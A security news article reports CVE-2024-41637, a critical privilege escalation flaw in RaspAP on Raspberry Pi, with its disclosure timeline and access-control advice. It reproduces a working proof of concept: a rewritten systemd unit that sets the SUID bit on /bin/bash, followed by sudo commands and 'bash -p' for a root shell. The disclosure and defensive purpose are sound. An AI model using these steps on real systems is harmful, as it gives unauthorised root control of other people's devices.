Saturday, December 14, 2024
HomeCVE/vulnerabilityRaspAP Flaw Let Hackers Escalate Privileges with Raspberry Pi Devices

RaspAP Flaw Let Hackers Escalate Privileges with Raspberry Pi Devices

Published on

SIEM as a Service

A critical local privilege escalation vulnerability has been discovered in RaspAP, an open-source project designed to transform Raspberry Pi devices into wireless access points or routers.

Identified as CVE-2024-41637, this flaw has been rated with a severity score of 9.9 (Critical) on the CVSS scale.

The vulnerability affected RaspAP versions before 3.1.5 and was disclosed publicly on July 27, 2024, after multiple attempts to contact the RaspAP security team went unanswered.

- Advertisement - SIEM as a Service

CVE-2024-41637 – RaspAP Local Privilege Escalation

RaspAP is widely used in educational settings, IoT applications, and by homelab enthusiasts for its ease of configuring and managing wireless networks through a web interface.

According to the 0xZon report, the vulnerability stems from improper access controls, where the www-data user can write to the restapi.service file and execute critical commands with sudo privileges without a password.

This combination allows attackers to escalate their privileges from www-data to root, potentially leading to severe security breaches.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

Exploitation Proof of Concept

Security researcher Aaron Haymore, who discovered the flaw, has provided a proof of concept (PoC) demonstrating how the vulnerability can be exploited.

The steps involve modifying the restapi.service file to execute arbitrary code with root privileges. Here’s a summary of the process:

  1. Edit the Service Configuration: As the www-data user, modify the restapi.service file located at /lib/systemd/system/restapi.service with the following configuration:
[Unit]
Description=Set SUID bit on /bin/bash
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'echo "Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash."'
ExecStop=/bin/bash -c 'chmod u+s /bin/bash'
Restart=always
RestartSec=1

[Install]
WantedBy=multi-user.target
  1. Reboot the Machine: Run the command sudo /sbin/reboot to reboot the machine and reload the daemon.
  2. Start the Modified Service: After rebooting, start the modified service using sudo /bin/systemctl start restapi.service.
  3. Stop the Service: To set the SUID bit, stop the service with sudo /bin/systemctl stop restapi.service.
  4. Gain Root Access: Execute /bin/bash -p to gain a root shell.

These steps illustrate how an attacker can exploit the vulnerability to gain root access, underscoring the critical nature of this security flaw.

Timeline and Response

The vulnerability was discovered and reported to the RaspAP security team on July 16, 2024. Despite multiple follow-up emails on July 18, 23, and 26, no response was received.

Consequently, the vulnerability was publicly disclosed on July 27, 2024. The RaspAP team’s lack of response highlights the importance of timely communication and addressing security issues promptly.

This vulnerability in RaspAP highlights the critical importance of correctly configuring access controls and user privileges within a system.

Allowing a low-privilege user like www-data to modify service files and use sudo without proper restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.

To prevent such vulnerabilities, it is essential to adhere to the following best practices for access control:

  • Implement the Principle of Least Privilege: Ensure that users have only the minimal level of access necessary to perform their duties. Restrict write permissions to service files to only those who need them.
  • Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure only trusted users can execute commands with elevated privileges. Avoid broad NOPASSWD configurations that can be exploited.
  • Secure Service Configurations: Ensure critical service configurations and scripts are protected from unauthorized modifications. Use appropriate file permissions and ownership settings.
  • Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert unauthorized changes or suspicious activities. Regularly review logs to catch potential exploitation attempts early.

By focusing on correct access controls and ensuring that permissions are appropriately configured, organizations can significantly reduce the risk of such vulnerabilities and maintain a more secure environment.

This case underscores the importance of diligently managing user privileges and access to critical system components.

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Nigerian National Extradited to Nebraska for Wire Fraud Charges

United States Attorney Susan Lehr announced the extradition of Abiola Kayode, 37, from Nigeria...

Dell Security Update, Patch for Multiple Critical Vulnerabilities

Dell Technologies has released a security advisory addressing multiple critical vulnerabilities that could expose...

CISA Issues 10 New Advisories on Industrial Control System Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) has issued ten critical advisories, highlighting vulnerabilities...

FBI Seizes Rydox Marketplace, Arrests Key Administrators

The Federal Bureau of Investigation (FBI) announced the seizure of Rydox, an illicit online...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Nigerian National Extradited to Nebraska for Wire Fraud Charges

United States Attorney Susan Lehr announced the extradition of Abiola Kayode, 37, from Nigeria...

Dell Security Update, Patch for Multiple Critical Vulnerabilities

Dell Technologies has released a security advisory addressing multiple critical vulnerabilities that could expose...

CISA Issues 10 New Advisories on Industrial Control System Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) has issued ten critical advisories, highlighting vulnerabilities...